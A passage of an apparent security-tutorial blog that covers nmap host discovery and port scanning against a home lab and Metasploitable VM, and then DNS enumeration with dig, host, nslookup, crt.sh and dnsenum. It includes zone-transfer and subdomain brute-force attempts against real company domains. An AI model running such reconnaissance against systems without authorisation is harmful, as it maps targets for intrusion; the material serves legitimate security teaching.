    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 14:43 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.0023s latency).
    MAC Address: 00:50:56:FC:7E:8B (VMware)
    Nmap scan report for 192.168.186.71
    Host is up (0.0011s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.72
    Host is up (0.0031s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.73
    Host is up (0.0012s latency).
    MAC Address: 00:0C:29:39:19:E4 (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0019s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (6 hosts up) scanned in 4.86 seconds

    In this example I chose to use ICMP Echo requests to scan the network. As expected, this scan took a little longer than the ARP scan we did in the last example. Remember to consider network contexts when performing scans. Since, I’m on a local network, it’s preferable to use an ARP scan to get results faster and more reliably.

    That being said, it’s important to try different protocols as systems are configured to respond differently:

    $ sudo nmap -sn -PP --disable-arp-ping 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 14:42 PDT
    Nmap scan report for 192.168.186.71
    Host is up (0.0038s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.72
    Host is up (0.0015s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.73
    Host is up (0.0012s latency).
    MAC Address: 00:0C:29:39:19:E4 (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0016s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 9.63 seconds

    In this example I told nmap to do a timestamp query scan and it took considerably longer. My VMware gateway was also configured not to respond to timestamp queries, so it did not show up in the results.

    Always mix and match protocol types. Some systems might be online but are configured not to respond to echo requests. So, you might find something that was missed in a previous scan by running nmap with different options.

    TCP/UDP/SCTP Scanning

    We’re taking another step higher in the protocol stack using TCP/UDP/SCTP scanning. In this type of scan, we’re using these protocols to probe a single port. While this scan has the highest level of overhead (and will be slower) it an advantage of being able to scan a host over the internet.

    As with the previous scans, we’re going to again use the -P option:

    • -PY: SCTP INIT
    • -PS: TCP SYN
    • -PA: TCP ACK
    • -PU: UDP

    Let’s try a SYN ping scan:

    $ sudo nmap -sn --disable-arp-ping -PS 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 15:04 PDT
    Nmap scan report for 192.168.186.2
    Host is up (0.0020s latency).
    MAC Address: 00:50:56:FC:7E:8B (VMware)
    Nmap scan report for 192.168.186.71
    Host is up (0.0012s latency).
    MAC Address: 00:0C:29:91:6A:82 (VMware)
    Nmap scan report for 192.168.186.72
    Host is up (0.0060s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0018s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (5 hosts up) scanned in 4.88 seconds

    nmap chooses ports to probe by default but you can specify them by putting a number or range next to the scan type:

    $ sudo nmap -sn --disable-arp-ping -PU53 192.168.186.0/24
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-20 15:06 PDT
    Nmap scan report for 192.168.186.72
    Host is up (0.0018s latency).
    MAC Address: 00:0C:29:19:6C:BF (VMware)
    Nmap scan report for 192.168.186.74
    Host is up (0.0017s latency).
    MAC Address: 00:0C:29:01:40:16 (VMware)
    Nmap scan report for 192.168.186.93
    Host is up.
    Nmap done: 256 IP addresses (3 hosts up) scanned in 9.61 seconds

    I chose port 53 (DNS) to perform my UDP scan because it’s super common. As you can see, I got fewer results with this and it took a lot longer. Again, it’s important to try different ports and protocols with these scans. For example, if I knew an organization had websites up and running, I might try ports 80 and 443 to see what servers they have online. If I’m scanning a business network with a lot of users, they may be using AD to manage their systems, so I might try port 389 or 636 for LDAP.

    Context matters!

    Port Scanning

    Now that we know what hosts are up and running, we can check what services are running on these hosts. Open ports present an opportunity for access, so it’s important to know what can be potentially accessed or exploited.

    We saw that nmap scans ports by default using full TCP connections, or just by using TCP SYN packets when running as root.

    To specify a scan option, we can use the -s argument with nine different options. We’ll only go over a few but I’ll list some common scans:

    • -sS: SYN Scan (default)
    • -sT: TCP Scan
    • -sU: UDP Scan
    • sY: SCTP Scan

    This sort of syntax should be familiar to you as it is very similar to the various ping scan options with -P. I used a SYN scan to scan my metasploitable machine:

    $ sudo nmap -sS ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 21:16 PDT
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0029s latency).
    Not shown: 977 closed tcp ports (reset)
    PORT     STATE SERVICE
    21/tcp   open  ftp
    22/tcp   open  ssh
    23/tcp   open  telnet
    25/tcp   open  smtp
    53/tcp   open  domain
    80/tcp   open  http
    111/tcp  open  rpcbind
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    512/tcp  open  exec
    513/tcp  open  login
    514/tcp  open  shell
    1099/tcp open  rmiregistry
    1524/tcp open  ingreslock
    2049/tcp open  nfs
    2121/tcp open  ccproxy-ftp
    3306/tcp open  mysql
    5432/tcp open  postgresql
    5900/tcp open  vnc
    6000/tcp open  X11
    6667/tcp open  irc
    8009/tcp open  ajp13
    8180/tcp open  unknown
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds

    nmap was able to find quite a bit of open ports. I like using the SYN scan because it combines the reliability of a TCP scan without being as slow (this scan only took 0.38 seconds) because it doesn’t establish a full connection.

    That being said, it’s important to try other scan types:

    $ sudo nmap -sU -p 53,1000-1010 ms2
    Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-22 21:20 PDT
    Nmap scan report for ms2 (192.168.186.131)
    Host is up (0.0018s latency).
    
    PORT     STATE         SERVICE
    53/udp   open          domain
    1000/udp closed        ock
    1001/udp open|filtered unknown
    1002/udp closed        unknown
    1003/udp closed        unknown
    1004/udp closed        unknown
    1005/udp open|filtered unknown
    1006/udp closed        unknown
    1007/udp closed        unknown
    1008/udp open|filtered ufsd
    1009/udp closed        unknown
    1010/udp closed        surf
    MAC Address: 00:0C:29:7B:A1:58 (VMware)
    
    Nmap done: 1 IP address (1 host up) scanned in 4.87 seconds

    This time, I told nmap to do a UDP scan. You’ll also notice that I specified what ports to scan using the -p option. You can tell nmap to scan a range, comma-separated values, ports specified by name, or every port using -p-.

    Even though I scanned only 11 ports, it took a little longer than the SYN scan. Outside of finding ports that were open and closed, nmap claimed some ports were open|filtered. This just mean that nmap couldn’t tell if the port was truly open, or is protected by some sort of firewall.

    Like I said when doing host discovery, it’s important to experiment with different scan methods. There are more than just the few types I listed, so feel free to check those out at nmap.org.

    Output

    As a penetration tester, it’s important to keep track of your scan results. Not only for you to go back over (instead of repeating scans), but for reporting purposes as well.

    nmap makes this a snap with the -o option. There are few options that go along with -o:

    • -oN: normal output
    • -oX: XML output
    • -oG: grepable output
    • -oA: output in all formats

    I usually stick with outputting my scan results in every format because they’re all useful in their own ways. I like normal output for reading over myself. Grepable output is great because it puts each host on a single line which makes it easier to grep by host (hence the name). Finally, XML output is extremely useful for web-based visualization tools or storing the results in a database. For example, I love feeding my XML scan results to metasploit, which makes it really easy to organize and search through my results.

    Conclusion

    If you made it this far, you can now add an invaluable tool to your hacking arsenal. This was a lengthy post so give your self a huge pat on the back for reading it all. Your learning is not over yet, though. To really make this stick, download nmap and play around on your own network. It’s fun and is a great way to make sure you retain what you learned. Otherwise (in my own experience) the knowledge won’t stick!

    References

  • DNS Enumeration

    DNS Enumeration

    Now, the fun begins. If you followed my last post about the basics of DNS, you should be armed and ready to tackle the subject of this post: DNS enumeration.

    DNS enumeration is the process of obtaining as much information about a target as possible by pulling from publicly available DNS records. This can expand the attack surface of a target by revealing their internet facing servers, email addresses, and more depending on how extensively you enumerate.

    The keyword in this definition is “publicly“. That means that all of the methods I’m about to show you in the next section you can try on your own (and I encourage you to do so).

    However, it’s important to note that some automated scripts brute-force subdomains by default, which may overload some older servers. This is unlikely though, but just make sure you know what the tool is going to do before you fire it off.

    With that being said, let’s get into enumerating DNS!

    Manual Techniques

    There are several scripts out there that allow you to automatically scrape tons of DNS information in a point and click fashion. However, it’s important to know how to manually enumerate DNS in order to modularize enumeration and adapt it to more specific situations.

    Don’t let the term “manual” scare you though. I’m going to go over a few tools that will make this process a snap.

    Whois

    Using the Whois service is a great starting point in your quest for information. With just the domain name of a target’s website, you can pull it’s registrar information, geographic location of its servers, name servers associated with it, and contact information system admins and technical support.

    The whois command is built into most UNIX based operating systems. So, if you’re running one of it’s variants like a Linux distro or MacOS, you can run:

    whois <domain name>

    You’ll quickly be overwhelmed with a bunch of information about that domain name. For this reason, I recommend using an online tool like https://www.whois.com/whois. They organize data a bit more graphically than the plain terminal-based whois command does.

    DiG

    If there’s one manual tool you need to know, it’s the dig command. Like whois, it comes prepackaged with many UNIX variants. Unlike whois, it’s much more powerful.

    To use dig, follow this format:

    dig @<name server> <domain name> <record type>

    The name server and record type positional arguments are optional. You can use dig in the same way as you would whois:

    [~]$ dig github.com
    
    ; <<>> DiG 9.16.1-Ubuntu <<>> github.com
    ;; global options: +cmd
    ;; Got answer:
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 4266
    ;; flags: qr ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
    
    ;; QUESTION SECTION:
    ;github.com.                    IN      A
    
    ;; ANSWER SECTION:
    github.com.             60      IN      A       192.30.255.113
    
    ;; Query time: 115 msec
    ;; SERVER: 8.8.8.8#53(8.8.8.8)
    ;; WHEN: Tue Feb 28 19:17:22 PST 2023
    ;; MSG SIZE  rcvd: 44

    By default, dig pulls A records and uses whatever nameserver it can access from my /etc/resolv.conf file. As you can see, it decided to use Google’s nameserver at 8.8.8.8.

    Of course, dig can be used for so much more. Let’s try pulling the nameservers of github.com:

    [~]$ dig github.com NS +short
    dns1.p08.nsone.net.
    dns2.p08.nsone.net.
    dns3.p08.nsone.net.
    dns4.p08.nsone.net.
    ns-1283.awsdns-32.org.
    ns-1707.awsdns-21.co.uk.
    ns-421.awsdns-52.com.
    ns-520.awsdns-01.net.

    In this example, I told dig to grab me the NS records associated with github.com and keep the output short and sweet with the +short query modifier. I like to use +short with dig because the output can be pretty cluttered.

    Another useful query type is the ANY query, which pulls all available records associated with a domain:

    [~]$ dig github.com ANY +noall +answer
    github.com.             60      IN      A       192.30.255.113
    github.com.             900     IN      NS      dns1.p08.nsone.net.
    github.com.             900     IN      NS      dns2.p08.nsone.net.
    github.com.             900     IN      NS      dns3.p08.nsone.net.
    github.com.             900     IN      NS      dns4.p08.nsone.net.
    github.com.             900     IN      NS      ns-1283.awsdns-32.org.
    github.com.             900     IN      NS      ns-1707.awsdns-21.co.uk.
    github.com.             900     IN      NS      ns-421.awsdns-52.com.
    github.com.             900     IN      NS      ns-520.awsdns-01.net.
    github.com.             900     IN      SOA     ns-1707.awsdns-21.co.uk. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
    github.com.             3600    IN      MX      1 aspmx.l.google.com.
    github.com.             3600    IN      MX      10 alt3.aspmx.l.google.com.
    github.com.             3600    IN      MX      10 alt4.aspmx.l.google.com.
    github.com.             3600    IN      MX      5 alt1.aspmx.l.google.com.
    github.com.             3600    IN      MX      5 alt2.aspmx.l.google.com.
    ...

    As you can see, dig was able to pull a variety of records, including SOA and MX. I also used the +noall combined with +answer query modifiers to single out the responses in the output. This is useful if you just want to see the results of a query (no annoying header messages) but want a little more info than what’s provided with +short.

    Additionally, dig can initiate zone transfer. A zone transfer is the process DNS servers use to transfer copies of records of a particular zone to another server. This is primarily used for redunancy–if one server goes down, another server with copies of all the records will be able to resume operation in its place.

    Misconfigured servers allow zone transfers to occur between anyone that requests it (including you). This can potentially leak private records.

    With dig it’s as simple as:

    [~]$ dig @dns3.p08.nsone.net github.com AXFR +noall +answer
    ; Transfer failed.

    I used the AXFR query type to initiate a zone transfer with one of github.com‘s nameservers. It didn’t let me. Good job GitHub.

    This is usually the case as zone transfers are a well-known vulnerability. However, never rule them out. Company nameservers usually have multiple nameservers for redundancy. In some cases, backups might be overlooked in terms of hardening. So, try zone transfers against all of a target’s nameservers. You might get lucky.

    Host

    Another tool worth mentioning that is very similar to dig and is bundled with most UNIX-based OS’s is host. Keep in mind this is not the same host command that is available on Windows by default.

    Just typing host and supplying it a domain name can reveal some useful information:

    [~]$ host reddit.com
    reddit.com has address 151.101.129.140
    reddit.com has address 151.101.193.140
    reddit.com has address 151.101.1.140
    reddit.com has address 151.101.65.140
    reddit.com has IPv6 address 2a04:4e42::396
    reddit.com has IPv6 address 2a04:4e42:600::396
    reddit.com has IPv6 address 2a04:4e42:400::396
    reddit.com has IPv6 address 2a04:4e42:200::396
    reddit.com mail is handled by 5 alt2.aspmx.l.google.com.
    reddit.com mail is handled by 1 aspmx.l.google.com.
    reddit.com mail is handled by 10 aspmx2.googlemail.com.
    reddit.com mail is handled by 10 aspmx3.googlemail.com.
    reddit.com mail is handled by 5 alt1.aspmx.l.google.com.

    With just one argument, host was able to pull reddit.com‘s A, AAAA, and MX records in an arguably cleaner fashion than dig.

    A useful argument I like using when running host is a:

    [~]$ host -a reddit.com
    Trying "reddit.com"
    Trying "reddit.com"
    ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12601
    ;; flags: qr rd ra; QUERY: 1, ANSWER: 34, AUTHORITY: 0, ADDITIONAL: 0
    
    ;; QUESTION SECTION:
    ;reddit.com.                    IN      ANY
    
    ;; ANSWER SECTION:
    reddit.com.             278     IN      A       151.101.193.140
    reddit.com.             278     IN      A       151.101.129.140
    reddit.com.             278     IN      A       151.101.65.140
    reddit.com.             278     IN      A       151.101.1.140
    reddit.com.             86378   IN      NS      ns-557.awsdns-05.net.
    reddit.com.             86378   IN      NS      ns-1029.awsdns-00.org.
    reddit.com.             86378   IN      NS      ns-1887.awsdns-43.co.uk.
    reddit.com.             86378   IN      NS      ns-378.awsdns-47.com.
    reddit.com.             878     IN      SOA     ns-557.awsdns-05.net. awsdns-hostmaster.amazon.com. 1 7200 900 1209600 86400
    reddit.com.             278     IN      MX      5 alt2.aspmx.l.google.com.
    reddit.com.             278     IN      MX      1 aspmx.l.google.com.
    reddit.com.             278     IN      MX      10 aspmx2.googlemail.com.
    reddit.com.             278     IN      MX      10 aspmx3.googlemail.com.
    reddit.com.             278     IN      MX      5 alt1.aspmx.l.google.com.
    reddit.com.             3578    IN      TXT     "google-site-verification=zZHozYbAJmSLOMG4OjQFoHiVqkxtdgvyBzsE7wUGFiw"
    reddit.com.             3578    IN      TXT     "logmein-verification-code=1e307fc8-361a-4e39-8012-ed0873b06668"
    reddit.com.             3578    IN      TXT     "onetrust-domain-verification=6b98ba3dd087405399bbf45b6cbdcd37"
    reddit.com.             3578    IN      TXT     "stripe-verification=9bd70dd1884421b47f596fea301e14838c9825cdba5b209990968fdc6f8010c7"
    reddit.com.             3578    IN      TXT     "twilio-domain-verification=5e37855d7c9445e967b31c5e0371ebb5"
    reddit.com.             3578    IN      TXT     "v=spf1 include:amazonses.com include:_spf.google.com include:mailgun.org include:19922862.spf01.hubspotemail.net ip4:174.129.203.189 ip4:52.205.61.79 ip4:54.172.97.247 ~all"
    reddit.com.             3578    IN      TXT     "614ac4be-8664-4cea-8e29-f84d08ad875c"
    reddit.com.             3578    IN      TXT     "MS=ms71041902"
    reddit.com.             3578    IN      TXT     "apple-domain-verification=qC3rSSKrh10DoMI7"
    reddit.com.             3578    IN      TXT     "atlassian-domain-verification=aGWDxGvt+oY3p7qTWt5v2uJDVJkoJAeHxwGqKmGQLMEsUXUJJe/Pm/k+GGNPpn6M"
    reddit.com.             3578    IN      TXT     "atlassian-domain-verification=vBaV6PXyyu4OAPLiQFbxFMCboSTjoR/qxKJ2OlpI46ZEpZL/FVTIfMlgoM5Hy9eY"
    reddit.com.             3578    IN      TXT     "box-domain-verification=95c33f4ee4b11d8827190dbc5371ca7df25b961019116e5565ce4aa36de9be3a"
    reddit.com.             3578    IN      TXT     "docusign=6ba0c5a9-5a5e-41f8-a7c8-8b4c6e35c10c"
    reddit.com.             3578    IN      TXT     "google-site-verification=0uv13-wxlHK8FFKaUpgzyrVmL1YdNYW6v3PupLdw3JI"
    reddit.com.             3578    IN      TXT     "google-site-verification=oh_YJE560y0e6FHP1RT7NIjyTlBhACNMvD2EgSss0sc"
    reddit.com.             278     IN      AAAA    2a04:4e42:200::396
    reddit.com.             278     IN      AAAA    2a04:4e42:400::396
    reddit.com.             278     IN      AAAA    2a04:4e42:600::396
    reddit.com.             278     IN      AAAA    2a04:4e42::396
    reddit.com.             86378   IN      CAA     0 issue "digicert.com; cansignhttpexchanges=yes"
    
    Received 1838 bytes from 10.220.0.1#53 in 15 ms

    As you can see, an absolutely enormous amount of information was pulled. That’s because using -a tells host to pull all of the records it can from it’s target.

    You can also perform zone transfers:

    [~]$ host -l reddit.com
    ;; Connection to 123.456.78.9#53(123.456.78.9) for reddit.com failed: connection refused.
    ;; Connection to 123.456.78.1#53(123.456.78.1) for reddit.com failed: connection refused.

    And it seems that the default nameserver (123.456.78.9) didn’t allow us to do this.

    Nslookup

    This tool functions fairly similarly to host and dig but has an optional interactive mode. This is useful for when you want to frequently options such as query types and nameservers without retyping the name of the command all over again.

    Here’s a quick example:

    [~]$ nslookup
    > set type=NS
    > microsoft.com
    Server:         123.456.78.9
    Address:        123.456.78.9#53
    
    Non-authoritative answer:
    microsoft.com   nameserver = ns4-39.azure-dns.info.
    microsoft.com   nameserver = ns1-39.azure-dns.com.
    microsoft.com   nameserver = ns2-39.azure-dns.net.
    microsoft.com   nameserver = ns3-39.azure-dns.org.
    
    Authoritative answers can be found from:
    > server ns1-39.azure-dns.com
    Default server: ns1-39.azure-dns.com
    Address: 150.171.10.39#53
    Default server: ns1-39.azure-dns.com
    Address: 2603:1061:0:10::27#53
    > set type=MX
    > microsoft.com
    Server:         ns1-39.azure-dns.com
    Address:        150.171.10.39#53
    
    microsoft.com   mail exchanger = 10 microsoft-com.mail.protection.outlook.com.

    To access interactive mode, I ran nslookup without any arguments. From there I set the query type to NS to look up microsoft.com‘s nameservers, then used one of their nameservers to look up their mail servers.

    As you can see, most of the commands I typed were only one or two words long. For this reason, I like nslookup for poking around if I’m not necessarily sure what I’m looking for and need to frequently update my commands.

    It’s important to note that these three tools (dig, host, nslookup) function very similarly. So, I encourage you to try all of them, use them interchangeably, and read the man pages for each one. They each have their strengths and weaknesses. The one you choose depends on your situation and preferences.

    Subdomain Enumeration

    Subdomain enumeration is the process of finding as many subdomains associated with a domain as possible. This is an important process of DNS enumeration as it expands our attack surface even further. You can also apply the techniques described previously on the subdomains you find to make your enumeration even more effective.

    Most modern search engines can be a useful tool for subdomain enumeration. If you read one of my earlier posts about Google Dorking, you may already be familiar with the technique I’m about to describe.

    Google makes subdomain enumeration a snap with the inurl parameter:

    iRobot’s subdomains provided by Google

    Using inurl and the domain name, irobot.com, I was able to find numerous subdomains. I also used -www to tell Google to exclude search results containing www.

    Another powerful tool for subdomain enumeration is the Certificate Search tool:

    cert.sh results from the query %.irobot.com

    The query I used to pull all of these results was %.irobot.com, where the % symbol was a wild card. This means that results with anything ending with “.irobot.com” will be a part of the search results.

    Combining these techniques is a powerful way of discovering subdomains that give you an edge by providing you with more information.

    Automated Techniques

    Now that you know some basic (but powerful) techniques for enumerating subdomains, its time to automate the process.

    There’s tons of tools out there that do all of these steps (and more) to provide you with as much information associated with a domain name as possible. One popular one is dnsenum. As described in its man pages dnsenum can perform:

    nslookup, zonetransfer, google scraping, domain brute force (support also recursion), whois ip and reverse lookups.

    Here’s what I was able to pull by pointing this tool at burgerking.com:

    [~]$ dnsenum burgerking.com
    dnsenum VERSION:1.2.6
    
    -----   burgerking.com   -----
    
    
    Host's addresses:
    __________________
    
    burgerking.com.                          37       IN    A        99.84.66.7
    burgerking.com.                          37       IN    A        99.84.66.86
    burgerking.com.                          37       IN    A        99.84.66.37
    burgerking.com.                          37       IN    A        99.84.66.51
    
    
    Name Servers:
    ______________
    
    udns1.cscdns.net.                        28800    IN    A        204.74.66.1
    udns2.cscdns.uk.                         13091    IN    A        204.74.111.1
    
    
    Mail (MX) Servers:
    ___________________
    
    ASPMX2.GOOGLEMAIL.com.                   293      IN    A        64.233.171.27
    ALT2.ASPMX.L.GOOGLE.com.                 293      IN    A        142.250.152.27
    ALT1.ASPMX.L.GOOGLE.com.                 293      IN    A        64.233.171.27
    ASPMX.L.GOOGLE.com.                      292      IN    A        142.250.141.26
    ASPMX3.GOOGLEMAIL.com.                   293      IN    A        142.250.152.27
    
    
    Trying Zone Transfers and getting Bind Versions:
    _________________________________________________
    
    
    Trying Zone Transfer for burgerking.com on udns1.cscdns.net ...
    AXFR record query failed: REFUSED
    
    Trying Zone Transfer for burgerking.com on udns2.cscdns.uk ...
    AXFR record query failed: REFUSED
    
    
    Brute forcing with /usr/share/dnsenum/dns.txt:
    _______________________________________________
    
    www.burgerking.com.                      86400    IN    CNAME    prod-bk-web.com.rbi.tools.
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.112
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.119
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.10
    prod-bk-web.com.rbi.tools.               60       IN    A        13.33.21.51

    I cut the scan short but you can see it was able to pull some useful servers (as well as their IP addresses), find some domains, and attempted to do a zone transfer and figure out the DNS server’s bind version.

    Other great tools include fierce, dnsrecon, and sublist3r (for enumerating subdomains). I encourage you to try them all out and see what tools work for you. There are also tons of opensource tools out there that I haven’t mentioned that you should try as well!

    Now that you’ve seen a fantastic tool that formats everything you might need beautifully with color-coding, you may be asking yourself: “Why even bother with manual testing in the first place?”

    While these tools are extremely efficient, they may not be a one line solution for all of your needs. It’s important when enumerating to supplement your automated information gathering with manual gathering.

    Manual enumeration is extremely flexible, allowing you to poke around at every angle you can think of and dig deeper than some automated scripts. It’s also worth noting that these automated scripts generate a ton of traffic. So, in a scenario where stealth is required, it may be more appropriate to manual test to fly under the radar.

    Conclusion

    DNS enumeration is a critical step in the process of analyzing your target. When executed correctly, it can be used to expose a wealth of information. The more information you have on a target, the more effective your penetration test will be.

    I only covered the basics to give you a starting point. I highly encourage you to look at the manual pages (with the man command, arguably the best UNIX command) to learn the ins and outs of these tools so you can make the most out of them. At the end of the day, these tools are simply lines of code–it’s up to you to make them useful.

    Remember, this information is all public, so feel free to practice on your own (you definitely should) and see what you can dig up. Just be careful when using the brute-force tools against servers you don’t own (again read the man pages so you know what you’re doing) and don’t use any of the information you gather without permission.

    That’s all and happy hunting! In the next post, I’m going to be talking about scanning with nmap so stay tuned for that!

    References

    https://resources.infosecinstitute.com/topic/dns-enumeration-techniques-in-linux/

    https://securitytrails.com/blog/dns-enumeration

    The Cybermentor’s Web Hacking Course